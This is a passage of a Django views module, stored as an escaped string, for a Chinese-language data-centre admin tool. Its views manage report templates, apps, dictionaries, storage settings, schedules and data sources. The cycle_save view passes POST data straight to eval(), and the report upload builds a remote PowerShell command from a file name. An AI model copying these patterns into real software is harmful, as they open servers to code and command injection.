ps_upload.run(\"\")\n\n if ps_upload_result['exec_tag'] == 1:\n errors.append(ps_upload_result['log'])\n else:\n # 判断报表路径是否存在\n # 若不存在,提示不存在,报表上传失败\n # 获取app_code\n try:\n cur_app = App.objects.get(id=int(app))\n except:\n write_tag = False\n errors.append('应用不存在。')\n else:\n app_code = cur_app.code\n aft_report_file_path = os.path.join(rs.report_file_path,\n str(app_code))\n report_check_cmd = r'if not exist {report_file_path} md {report_file_path}'.format(\n report_file_path=aft_report_file_path)\n\n rc = ServerByPara(report_check_cmd, remote_ip,\n remote_user,\n remote_password, remote_platform)\n rc_result = rc.run(\"\")\n\n if rc_result['exec_tag'] == 1:\n errors.append(rc_result['log'])\n else:\n # 获取本地IP\n try:\n web_server = socket.gethostbyname(\n socket.gethostname())\n except Exception as e:\n errors.append(\"获取服务器IP失败:%s\" % e)\n else:\n url_visited = 
r\"http://{web_server}/download_file?file_name={file_name}\".format(\n web_server=web_server, file_name=file_name)\n remote_cmd = r'powershell.exe -ExecutionPolicy RemoteSigned -file \"{0}\" \"{1}\" \"{2}\"'.format(\n ps_script_path,\n os.path.join(aft_report_file_path,\n file_name),\n url_visited)\n\n server_obj = ServerByPara(remote_cmd, remote_ip,\n remote_user,\n remote_password,\n remote_platform)\n result = server_obj.run(\"\")\n if result[\"exec_tag\"] == 0:\n write_tag = True\n else:\n errors.append(result['log'])\n\n if id != 0 and not my_file:\n write_tag = True\n\n # 远程文件下载成功\n if write_tag:\n # 新增报表模板\n if id == 0:\n all_report = ReportModel.objects.filter(\n code=code).exclude(state=\"9\")\n if all_report.exists():\n errors.append('报表编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel()\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app)\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.save()\n\n # 关联存储报表模板信息\n if report_info_num:\n range_num = int(report_info_num / 3)\n for i in range(0, range_num):\n report_info = ReportInfo()\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n\n id = report_save.id\n except:\n errors.append('数据异常,请联系管理员!')\n # 修改报表模板\n else:\n all_report = ReportModel.objects.filter(code=code).exclude(\n id=id).exclude(state=\"9\")\n if all_report.exists():\n errors.append('存储编码:' + code + '已存在。')\n else:\n try:\n report_save = ReportModel.objects.get(id=id)\n report_save.name = name\n report_save.code = code\n report_save.report_type = report_type\n report_save.app_id = int(app)\n if my_file:\n report_save.file_name = file_name\n report_save.sort = int(sort) if sort else None\n report_save.save()\n\n # 修改报表信息关联\n # 情况:报表信息组相对数据库中存储树,增加/减少/相同 一样\n if report_info_num:\n range_num = int(report_info_num / 3)\n current_report_info = report_save.reportinfo_set.exclude(\n state=\"9\")\n\n update_id_list = []\n for i in range(0, range_num):\n report_info_name = request.POST.get(\n \"report_info_name_%d\" % (i + 1), \"\")\n report_info_default_value = request.POST.get(\n \"report_info_value_%d\" % (i + 1), \"\")\n report_info_id = request.POST.get(\n \"report_info_id_%d\" % (i + 1), \"\")\n report_info_id = int(\n report_info_id) if report_info_id else \"\"\n\n if report_info_id:\n update_id_list.append(report_info_id)\n report_info = ReportInfo.objects.filter(\n id=report_info_id)\n if report_info.exists() and report_info_name:\n report_info = report_info[0]\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n else:\n report_info = ReportInfo()\n if report_info_name:\n report_info.name = report_info_name\n report_info.default_value = report_info_default_value\n report_info.report_model = report_save\n report_info.save()\n update_id_list.append(report_info.id)\n current_report_info.exclude(\n id__in=update_id_list).update(\n state=\"9\")\n\n id = report_save.id\n except Exception as e:\n errors.append(\"修改失败。\")\n else:\n errors.append('本次上传报表任务失败。')\n return render(request, 'report_app.html',\n {'username': 
request.user.userinfo.fullname,\n \"report_type_list\": report_type_list,\n \"all_app_list\": all_app_list,\n \"errors\": errors,\n \"id\": id,\n \"adminapp\": adminapp,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_data(request):\n if request.user.is_authenticated():\n result = []\n search_app = request.GET.get('search_app', '')\n\n try:\n search_app = int(search_app)\n except Exception:\n pass\n\n all_report = ReportModel.objects.exclude(state=\"9\").order_by(\"-if_template\", \"sort\")\n\n # 当前应用下的所有报表+系统模板报表\n if search_app:\n template_report = all_report.filter(if_template=1)\n app_report = all_report.filter(app_id=search_app)\n\n all_report = template_report | app_report\n\n # if search_app != \"\":\n # curadminapp = App.objects.get(id=int(search_app))\n # all_report = all_report.filter(app=curadminapp)\n\n for report in all_report:\n # 报表类型\n report_type = report.report_type\n try:\n report_type_dict_list = DictList.objects.filter(id=int(report.report_type))\n if report_type_dict_list.exists():\n report_type_dict_list = report_type_dict_list[0]\n report_type = report_type_dict_list.name\n except:\n pass\n\n report_info_list = []\n current_report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if current_report_info_set.exists():\n for report_info in current_report_info_set:\n report_info_list.append({\n \"report_info_name\": report_info.name,\n \"report_info_value\": report_info.default_value,\n \"report_info_id\": int(report_info.id),\n })\n result.append({\n \"id\": report.id,\n \"name\": report.name,\n \"code\": report.code,\n \"file_name\": report.file_name,\n \"report_type\": report_type,\n \"report_type_id\": int(report.report_type) if report.report_type else \"\",\n \"app\": report.app.name if report.app else \"\",\n \"app_id\": report.app.id if report.app else \"\",\n \"report_type_num\": report.report_type,\n \"sort\": report.sort,\n \"report_info_list\": report_info_list,\n \"if_template\": report.if_template,\n })\n\n return JsonResponse({\"data\": result})\n\n\ndef report_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n report = ReportModel.objects.filter(id=id)\n\n # 修改:删除远程服务器文件\n if report.exists():\n report = report[0]\n report.state = \"9\"\n report.save()\n\n # 删除关联report_info\n report_info_set = report.reportinfo_set.exclude(state=\"9\")\n if report_info_set.exists():\n for i in report_info_set:\n i.state = \"9\"\n i.save()\n\n c_file_name = report.file_name\n the_file_name = settings.BASE_DIR + os.sep + \"datacenter\" + os.sep + \"upload\" + os.sep + \"report_doc\" + os.sep + c_file_name\n if os.path.exists(the_file_name):\n try:\n os.remove(the_file_name)\n except:\n pass\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n else:\n return HttpResponse(0)\n\n\ndef app_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n app_name = request.POST.get(\"app_name\", \"\")\n app_code = request.POST.get(\"app_code\", \"\")\n remark = request.POST.get(\"remark\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n work_data = []\n\n try:\n work_data = json.loads(request.POST.get(\"work_data\", \"\"))\n except:\n pass\n try:\n id = int(id)\n except:\n raise Http404()\n result = {}\n\n if app_name.strip() == '':\n result[\"res\"] = '应用名称不能为空。'\n else:\n if app_code.strip() == '':\n result[\"res\"] = '应用编码不能为空。'\n else:\n if remark.strip() == 
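# --- Sketch: app_save below validates name/code/remark/work_data with a
# deeply nested if/else ladder. The same first-failing-rule behaviour can be
# flattened into a scan over (condition, message) pairs; field values here
# are illustrative only.
def first_error(rules):
    """Return the message of the first failing rule, or None if all pass."""
    for ok, message in rules:
        if not ok:
            return message
    return None

app_name, app_code, remark, work_data = "报表应用", "RPT", "说明", [("w1",)]
msg = first_error([
    (bool(app_name.strip()), "应用名称不能为空。"),
    (bool(app_code.strip()), "应用编码不能为空。"),
    (bool(remark.strip()), "说明不能为空。"),
    (bool(work_data), "至少配置一个业务。"),
])
print(msg)  # None -> all checks passed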
'':\n result[\"res\"] = '说明不能为空。'\n else:\n if not work_data:\n result[\"res\"] = '至少配置一个业务。'\n else:\n def save_work(app):\n wd_list = []\n for wd in work_data:\n try:\n wd_id = int(wd[0])\n except:\n work = Work()\n work.app = app\n work.name = wd[1]\n work.code = wd[2]\n work.remark = wd[3]\n if wd[4]:\n work.core = wd[4]\n if wd[5]:\n work.sort = int(wd[5])\n work.save()\n wd_list.append(work.id)\n else:\n wd_list.append(wd_id)\n try:\n work = Work.objects.get(id=wd_id)\n work.name = wd[1]\n work.code = wd[2]\n work.remark = wd[3]\n if wd[4]:\n work.core = wd[4]\n if wd[5]:\n work.sort = int(wd[5])\n work.save()\n except:\n pass\n app.work_set.exclude(id__in=wd_list).update(state='9')\n\n if id == 0:\n all_app = App.objects.filter(\n code=app_code).exclude(state=\"9\")\n if (len(all_app) > 0):\n result[\"res\"] = '存储代码:' + app_code + '已存在。'\n else:\n app_save = App()\n app_save.name = app_name\n app_save.code = app_code\n app_save.remark = remark\n app_save.sort = int(sort) if sort else None\n app_save.save()\n save_work(app_save)\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = app_save.id\n else:\n all_app = App.objects.filter(code=app_code).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_app) > 0):\n result[\"res\"] = '存储代码:' + app_code + '已存在。'\n else:\n try:\n app_save = App.objects.get(id=id)\n app_save.name = app_name\n app_save.code = app_code\n app_save.remark = remark\n app_save.sort = int(sort) if sort else None\n app_save.save()\n save_work(app_save)\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = app_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败。\"\n return JsonResponse(result)\n\n\ndef app_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n app = App.objects.get(id=id)\n app.state = \"9\"\n app.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef app_index(request, funid):\n \"\"\"\n 应用管理\n \"\"\"\n if request.user.is_authenticated():\n return render(request, 'app.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef app_data(request):\n if request.user.is_authenticated():\n result = []\n\n all_app = App.objects.exclude(state=\"9\").order_by(\"sort\").values()\n all_work = Work.objects.exclude(state='9').order_by(\"sort\").values()\n for app in all_app:\n work_list = []\n # 应用对应的所有业务\n for work in all_work:\n if app['id'] == work['app_id']:\n tmp_list = [work['id'], work['name'], work['code'], work['remark'], work['core'], work['sort']]\n work_list.append(tmp_list)\n\n result.append({\n \"id\": app['id'],\n \"name\": app['name'],\n \"code\": app['code'],\n \"remark\": app['remark'],\n \"sort\": app['sort'],\n \"works\": json.dumps(work_list, ensure_ascii=False),\n })\n return JsonResponse({\"data\": result})\n\n\ndef dictindex(request, funid):\n if request.user.is_authenticated():\n alldict = DictIndex.objects.order_by(\"sort\").exclude(state=\"9\")\n return render(request, 'dict.html',\n {'username': request.user.userinfo.fullname,\n \"alldict\": alldict, \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef dictsave(request):\n if 'dictid' in request.POST:\n result = {}\n dictid = request.POST.get('dictid', '')\n dictname = request.POST.get('dictname', '')\n dictsort = request.POST.get('dictsort', '')\n try:\n dictsort = int(dictsort)\n except:\n 
dictsort = 999999\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n if dictname.strip() == '':\n result[\"res\"] = '字典名称不能为空。'\n else:\n if dictid == 0:\n alldict = DictIndex.objects.filter(\n name=dictname).exclude(state=\"9\")\n if (len(alldict) > 0):\n result[\"res\"] = dictname + '已存在。'\n else:\n dictsave = DictIndex()\n dictsave.name = dictname\n dictsave.sort = dictsort\n dictsave.save()\n dictsave = DictIndex.objects.filter(\n name=dictname).exclude(state=\"9\")\n result[\"res\"] = \"新增成功。\"\n result[\"data\"] = dictsave[0].id\n else:\n alldict = DictIndex.objects.filter(\n name=dictname).exclude(id=dictid).exclude(state=\"9\")\n if (len(alldict) > 0):\n result[\"res\"] = dictname + '已存在。'\n else:\n try:\n dictsave = DictIndex.objects.get(id=dictid)\n dictsave.name = dictname\n dictsave.sort = dictsort\n dictsave.save()\n result[\"res\"] = \"修改成功。\"\n except:\n result[\"res\"] = \"修改失败。\"\n return HttpResponse(json.dumps(result))\n\n\ndef dictselect(request):\n if request.method == 'GET':\n result = []\n dictid = request.GET.get('dictid', '')\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n alldict = DictIndex.objects.get(id=dictid)\n allDictList = DictList.objects.order_by(\"sort\").filter(\n dictindex=alldict).exclude(state=\"9\")\n if (len(allDictList) > 0):\n for dict_list in allDictList:\n result.append(\n {\"id\": dict_list.id, \"name\": dict_list.name, \"sort\": dict_list.sort})\n return HttpResponse(json.dumps(result))\n\n\ndef dictlistsave(request):\n if 'dictid' in request.POST:\n result = {}\n\n listid = request.POST.get('listid', '')\n dictid = request.POST.get('dictid', '')\n listname = request.POST.get('listname', '')\n listsort = request.POST.get('listsort', '')\n\n try:\n listsort = int(listsort)\n except:\n listsort = 999999\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n try:\n listid = int(listid.replace(\"list_\", \"\"))\n except:\n raise Http404()\n if listname.strip() == '':\n result[\"res\"] = '条目名称不能为空。'\n else:\n alldict = DictIndex.objects.get(id=dictid)\n if listid == 0:\n\n alllist = DictList.objects.filter(\n name=listname, dictindex=alldict).exclude(state=\"9\")\n if (len(alllist) > 0):\n result[\"res\"] = listname + '已存在。'\n else:\n listsave = DictList()\n listsave.dictindex = alldict\n listsave.name = listname\n listsave.sort = listsort\n listsave.save()\n listsave = DictList.objects.filter(\n name=listname, dictindex=alldict).exclude(state=\"9\")\n result[\"res\"] = \"新增成功。\"\n result[\"data\"] = listsave[0].id\n else:\n alllist = DictList.objects.filter(name=listname).filter(dictindex=alldict).exclude(id=listid).exclude(\n state=\"9\")\n if (len(alllist) > 0):\n result[\"res\"] = listname + '已存在。'\n else:\n try:\n listsave = DictList.objects.get(id=listid)\n listsave.name = listname\n listsave.sort = listsort\n listsave.save()\n result[\"res\"] = \"修改成功。\"\n except:\n result[\"res\"] = \"修改失败。\"\n return HttpResponse(json.dumps(result))\n\n\ndef dictdel(request):\n if 'dictid' in request.POST:\n result = \"\"\n dictid = request.POST.get('dictid', '')\n try:\n dictid = int(dictid.replace(\"dict_\", \"\"))\n except:\n raise Http404()\n alldict = DictIndex.objects.filter(id=dictid)\n if (len(alldict) > 0):\n dictsave = alldict[0]\n dictsave.state = \"9\"\n dictsave.save()\n result = \"删除成功。\"\n else:\n result = '字典不存在。'\n return HttpResponse(result)\n\n\ndef dictlistdel(request):\n if 'listid' in request.POST:\n result = \"\"\n listid = 
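# --- Sketch of the "dict_<id>" / "list_<id>" parsing the dictionary views
# above perform with replace() + int(). This stricter variant rejects
# malformed input outright; raising ValueError maps naturally onto the
# views' Http404.
def parse_prefixed_id(raw, prefix):
    """Parse ids like 'dict_12' -> 12, rejecting values without the prefix."""
    if not raw.startswith(prefix):
        raise ValueError("expected prefix %r in %r" % (prefix, raw))
    return int(raw[len(prefix):])

print(parse_prefixed_id("dict_12", "dict_"))  # 12
print(parse_prefixed_id("list_0", "list_"))   # 0 -> "new entry" in the views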
request.POST.get('listid', '')\n try:\n listid = int(listid.replace(\"list_\", \"\"))\n except:\n raise Http404()\n alllist = DictList.objects.filter(id=listid)\n if (len(alllist) > 0):\n listsave = alllist[0]\n listsave.state = \"9\"\n listsave.save()\n result = \"删除成功。\"\n else:\n result = '条目不存在。'\n return HttpResponse(result)\n\n\ndef storage_index(request, funid):\n \"\"\"\n 存储配置\n \"\"\"\n if request.user.is_authenticated():\n storage_type_list = []\n valid_time_list = []\n\n dict_list = DictList.objects.exclude(state='9', dictindex__state='9').values(\n 'id', 'name', 'dictindex__id'\n )\n\n for dl in dict_list:\n if dl['dictindex__id'] == 4:\n # 存储类型\n storage_type_list.append({\n \"storage_name\": dl['name'],\n \"storage_type_id\": dl['id'],\n })\n if dl['dictindex__id'] == 3:\n # 有效时间\n valid_time_list.append({\n \"valid_time\": dl['name'],\n \"valid_time_id\": dl['id'],\n })\n\n return render(request, 'storage.html',\n {'username': request.user.userinfo.fullname,\n \"storage_type_list\": storage_type_list,\n \"valid_time_list\": valid_time_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef storage_data(request):\n if request.user.is_authenticated():\n result = []\n all_storage = Storage.objects.exclude(state=\"9\").order_by(\"sort\")\n\n all_dict_list = DictList.objects.exclude(\n state='9').values('id', 'name')\n\n for storage in all_storage:\n storage_type = storage.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n validtime = storage.validtime\n try:\n validtime_dict_list = DictList.objects.filter(id=int(storage.validtime))\n if validtime_dict_list.exists():\n validtime_dict_list = validtime_dict_list[0]\n validtime = validtime_dict_list.name\n except:\n pass\n\n result.append({\n \"id\": storage.id,\n \"name\": storage.name,\n \"tablename\": storage.tablename,\n \"storagetype_num\": storage_type,\n \"validtime_num\": storage.validtime,\n \"storagetype\": storage_type_display,\n \"validtime\": validtime,\n \"sort\": storage.sort,\n })\n return JsonResponse({\"data\": result})\n\n\ndef storage_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n storage_name = request.POST.get(\"storage_name\", \"\")\n table_name = request.POST.get(\"table_name\", \"\")\n storage_type = request.POST.get(\"storage_type\", \"\")\n valid_time = request.POST.get(\"valid_time\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if storage_name.strip() == '':\n result[\"res\"] = '存储名称不能为空。'\n else:\n\n if table_name.strip() == '':\n result[\"res\"] = '数据库表名不能为空。'\n else:\n if storage_type.strip() == '':\n result[\"res\"] = '存储类型不能为空。'\n else:\n if valid_time.strip() == '':\n result[\"res\"] = '有效时间不能为空。'\n else:\n if id == 0:\n all_storage = Storage.objects.filter(\n name=storage_name).exclude(state=\"9\")\n if (len(all_storage) > 0):\n result[\"res\"] = '存储名称:' + \\\n storage_name + '已存在。'\n else:\n try:\n storage_save = Storage()\n storage_save.name = storage_name\n storage_save.tablename = table_name\n storage_save.storagetype = storage_type\n storage_save.validtime = valid_time\n storage_save.sort = sort if sort else None\n storage_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = storage_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"保存失败。\"\n else:\n all_storage = 
Storage.objects.filter(name=storage_name).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_storage) > 0):\n result[\"res\"] = '存储名称:' + \\\n storage_name + '已存在。'\n else:\n try:\n storage_save = Storage.objects.get(\n id=id)\n storage_save.name = storage_name\n storage_save.tablename = table_name\n storage_save.storagetype = storage_type\n storage_save.validtime = valid_time\n storage_save.sort = int(\n sort) if sort else None\n storage_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = storage_save.id\n except:\n result[\"res\"] = \"修改失败。\"\n return JsonResponse(result)\n\n\ndef storage_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n storage = Storage.objects.get(id=id)\n storage.state = \"9\"\n storage.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef cycle_index(request, funid):\n \"\"\"\n 周期配置\n \"\"\"\n if request.user.is_authenticated():\n return render(request, 'cycle.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef cycle_data(request):\n if request.user.is_authenticated():\n result = []\n\n all_cycle = Cycle.objects.exclude(state=\"9\").order_by(\"sort\")\n for cycle in all_cycle:\n schedule_type = cycle.schedule_type\n schedule_type_display = cycle.get_schedule_type_display()\n\n sub_cycles = cycle.subcycle_set.exclude(state=\"9\")\n sub_cycle_data = []\n for sc in sub_cycles:\n sub_cycle_data.append({\n \"sub_cycle_id\": sc.id,\n \"minutes\": sc.minute,\n \"hours\": sc.hour,\n \"per_week\": sc.day_of_week,\n \"per_month\": sc.day_of_month,\n \"per_hour\": sc.min_of_hour,\n })\n\n result.append({\n \"id\": cycle.id,\n \"name\": cycle.name,\n \"sort\": cycle.sort,\n \"schedule_type\": schedule_type,\n \"schedule_type_display\": schedule_type_display,\n \"sub_cycle_data\": sub_cycle_data\n })\n\n return JsonResponse({\"data\": result})\n\n\ndef cycle_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n cycle_name = request.POST.get(\"cycle_name\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n schedule_type = request.POST.get('schedule_type', '')\n\n sub_cycle = eval(request.POST.get('sub_cycle', '[]'))\n # [{'hours': '0', 'minutes': '00', 'per_month': '324', 'per_week': '', 'sub_cycle_id': '暂无'}]\n try:\n id = int(id)\n except:\n raise Http404()\n result = {}\n\n if cycle_name.strip() == '':\n result[\"res\"] = '周期名称不能为空。'\n else:\n # 周期类型\n try:\n schedule_type = int(schedule_type)\n except ValueError as e:\n return JsonResponse({\n \"res\": \"周期类型未选择。\"\n })\n if id == 0:\n all_cycle = Cycle.objects.filter(\n name=cycle_name).exclude(state=\"9\")\n if (len(all_cycle) > 0):\n result[\"res\"] = '存储代码:' + cycle_name + '已存在。'\n else:\n try:\n with transaction.atomic():\n cycle_save = Cycle()\n cycle_save.name = cycle_name\n cycle_save.schedule_type = schedule_type\n cycle_save.sort = int(sort) if sort else None\n cycle_save.save()\n for sc in sub_cycle:\n sc_data = {\n \"hour\": sc[\"hours\"],\n \"minute\": sc[\"minutes\"],\n \"day_of_week\": sc[\"per_week\"],\n \"day_of_month\": sc[\"per_month\"],\n \"min_of_hour\": sc[\"per_hour\"],\n }\n cycle_save.subcycle_set.create(**sc_data)\n except Exception as e:\n result[\"res\"] = \"保存失败:{0}\".format(e)\n else:\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = cycle_save.id\n else:\n all_cycle = 
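# --- Sketch: storage_data above resolves each storage type's display name
# by scanning all_dict_list once per row. Building an id -> name map up
# front makes each lookup O(1); inline sample data stands in for the
# DictList queryset.
all_dict_list = [{"id": 4, "name": "关系库"}, {"id": 5, "name": "时序库"}]
storages = [{"name": "日表", "storagetype": "4"}, {"name": "实时", "storagetype": "5"}]

name_by_id = {str(d["id"]): d["name"] for d in all_dict_list}
for storage in storages:
    display = name_by_id.get(storage["storagetype"], "")
    print(storage["name"], "->", display)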
Cycle.objects.filter(name=cycle_name).exclude(\n id=id).exclude(state=\"9\")\n if (len(all_cycle) > 0):\n result[\"res\"] = '存储名称:' + cycle_name + '已存在。'\n else:\n try:\n with transaction.atomic():\n cycle_save = Cycle.objects.get(id=id)\n cycle_save.name = cycle_name\n cycle_save.schedule_type = schedule_type\n cycle_save.sort = int(\n sort) if sort else None\n cycle_save.save()\n\n # 删除原有而后不存在的\n # 原有的ID与现在的ID校对 ID不存在的删除\n sc_id_list = [int(sc[\"sub_cycle_id\"]) for sc in sub_cycle if sc[\"sub_cycle_id\"] != \"暂无\"]\n existed_sub_cycles = cycle_save.subcycle_set.exclude(state=\"9\")\n for esc in existed_sub_cycles:\n if esc.id not in sc_id_list:\n esc.state = \"9\"\n esc.save()\n\n for sc in sub_cycle:\n sc_data = {\n \"hour\": sc[\"hours\"],\n \"minute\": sc[\"minutes\"],\n \"day_of_week\": sc[\"per_week\"],\n \"day_of_month\": sc[\"per_month\"],\n \"min_of_hour\": sc[\"per_hour\"],\n }\n # add/edit\n if sc[\"sub_cycle_id\"] == \"暂无\":\n cycle_save.subcycle_set.create(**sc_data)\n else:\n sub_cycle_id = int(sc[\"sub_cycle_id\"])\n SubCycle.objects.exclude(state=\"9\").filter(id=sub_cycle_id).update(**sc_data)\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败:{0}\".format(e)\n else:\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = cycle_save.id\n return JsonResponse(result)\n\n\ndef cycle_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n cycle = Cycle.objects.get(id=id)\n cycle.state = \"9\"\n cycle.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef get_select_source_type(temp_source_type=None):\n try:\n temp_source_type = int(temp_source_type)\n except:\n pass\n c_dict_index = DictIndex.objects.filter(id=2).exclude(state='9')\n if c_dict_index.exists():\n c_dict_index = c_dict_index[0]\n dict_list = c_dict_index.dictlist_set.exclude(state=\"9\")\n source_type_list = []\n for i in dict_list:\n source_type_list.append({\n \"source_type_id\": i.id,\n \"source_type\": i.name,\n \"source_if_selected\": \"selected\" if temp_source_type == i.id else \"\",\n })\n else:\n source_type_list = []\n return source_type_list\n\n\ndef source_index(request, funid):\n \"\"\"\n 数据源配置\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n try:\n errors = []\n selectid = \"\"\n id = \"\"\n pid = \"\"\n title = \"\"\n code = \"\"\n name = \"\"\n connection = \"\"\n\n hiddendiv = \"hidden\"\n # 数据源类型\n source_type_list = get_select_source_type()\n\n # 新增/保存/修改\n if request.method == \"POST\":\n hiddendiv = \"\"\n id = request.POST.get('id', '')\n pid = request.POST.get('pid', '')\n name = request.POST.get('name', '')\n code = request.POST.get('code', '')\n connection = request.POST.get('connection', '')\n sourcetype = request.POST.get('sourcetype', '')\n\n source_type_list = get_select_source_type(\n temp_source_type=sourcetype)\n\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n pid = int(pid)\n except:\n raise Http404()\n if id == 0:\n selectid = pid\n title = \"新建\"\n else:\n selectid = id\n title = name\n\n if code.strip() == '':\n errors.append('数据源代码不能为空。')\n else:\n if name.strip() == '':\n errors.append('数据源名称不能为空。')\n else:\n if connection.strip() == '':\n errors.append('连接符不能为空。')\n else:\n if sourcetype.strip() == '':\n errors.append('数据源类型不能为空。')\n else:\n try:\n # 新增步骤\n if id == 0:\n try:\n pid = int(pid)\n except:\n pid = None\n max_sort_from_pnode = \\\n 
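# --- Sketch of the sub-cycle reconciliation inside cycle_save: rows whose
# id is missing from the submission are soft-deleted (state "9"), rows
# posted as "暂无" are created, and the rest are updated. Plain dicts stand
# in for SubCycle instances; not the project's actual helper.
def reconcile(existing_ids, submitted):
    """Return (ids_to_soft_delete, rows_to_create, rows_to_update)."""
    keep = {int(s["sub_cycle_id"]) for s in submitted if s["sub_cycle_id"] != "暂无"}
    to_delete = [row_id for row_id in existing_ids if row_id not in keep]
    to_create = [s for s in submitted if s["sub_cycle_id"] == "暂无"]
    to_update = [s for s in submitted if s["sub_cycle_id"] != "暂无"]
    return to_delete, to_create, to_update

existing_ids = [1, 2, 3]
submitted = [{"sub_cycle_id": "2"}, {"sub_cycle_id": "暂无"}]
print(reconcile(existing_ids, submitted))  # ([1, 3], [{..'暂无'}], [{..'2'}])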
Source.objects.exclude(state=\"9\").filter(type='').filter(\n pnode_id=None).aggregate(\n Max(\"sort\"))[\n \"sort__max\"]\n else:\n max_sort_from_pnode = \\\n Source.objects.exclude(state=\"9\").filter(type='').filter(\n pnode_id=pid).aggregate(\n Max(\"sort\"))[\n \"sort__max\"]\n\n # 当前没有父节点\n if max_sort_from_pnode or max_sort_from_pnode == 0:\n my_sort = max_sort_from_pnode + 1\n else:\n my_sort = 0\n\n source = Source()\n source.name = name\n source.connection = connection\n source.code = code\n source.sort = my_sort\n source.sourcetype = sourcetype\n source.pnode_id = pid\n source.save()\n\n id = source.id\n title = name\n selectid = id\n else:\n source = Source.objects.filter(id=id)\n if source.exists():\n source = source[0]\n source.name = name\n source.code = code\n source.connection = connection\n source.sourcetype = sourcetype\n source.save()\n\n title = name\n else:\n errors.append(\n \"当前资源不存在,无法修改,请联系客服!\")\n except:\n errors.append('保存失败。')\n\n # 加载树\n treedata = []\n rootnodes = Source.objects.order_by(\n \"sort\").filter(pnode=None).exclude(state=\"9\").filter(type='')\n\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = dict()\n root[\"text\"] = rootnode.name\n root[\"id\"] = rootnode.id\n\n root[\"data\"] = {\n \"code\": rootnode.code,\n \"sourcetype\": rootnode.sourcetype,\n \"connection\": rootnode.connection,\n \"sort\": rootnode.sort,\n \"verify\": \"first_node\",\n }\n root[\"children\"] = get_source_tree(\n rootnode, selectid)\n root[\"state\"] = {\"opened\": True}\n treedata.append(root)\n\n treedata = json.dumps(treedata)\n return render(request, 'source.html',\n {'username': request.user.userinfo.fullname,\n \"treedata\": treedata,\n \"title\": title,\n \"errors\": errors,\n \"source_type_list\": source_type_list,\n # 表单默认数据\n \"hiddendiv\": hiddendiv,\n \"id\": id,\n \"pid\": pid,\n \"code\": code,\n \"name\": name,\n \"connection\": connection,\n \"pagefuns\": getpagefuns(funid,request)})\n except Exception as e:\n print(e)\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_source_tree(parent, selectid):\n nodes = []\n children = parent.children.exclude(state=\"9\").order_by(\"sort\").exclude(state=\"9\")\n for child in children:\n node = dict()\n node[\"text\"] = child.name\n node[\"id\"] = child.id\n node[\"children\"] = get_source_tree(child, selectid)\n node[\"data\"] = {\n \"code\": child.code,\n \"sourcetype\": child.sourcetype,\n \"connection\": child.connection,\n \"sort\": child.sort,\n }\n try:\n if int(selectid) == child.id:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef del_source(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n 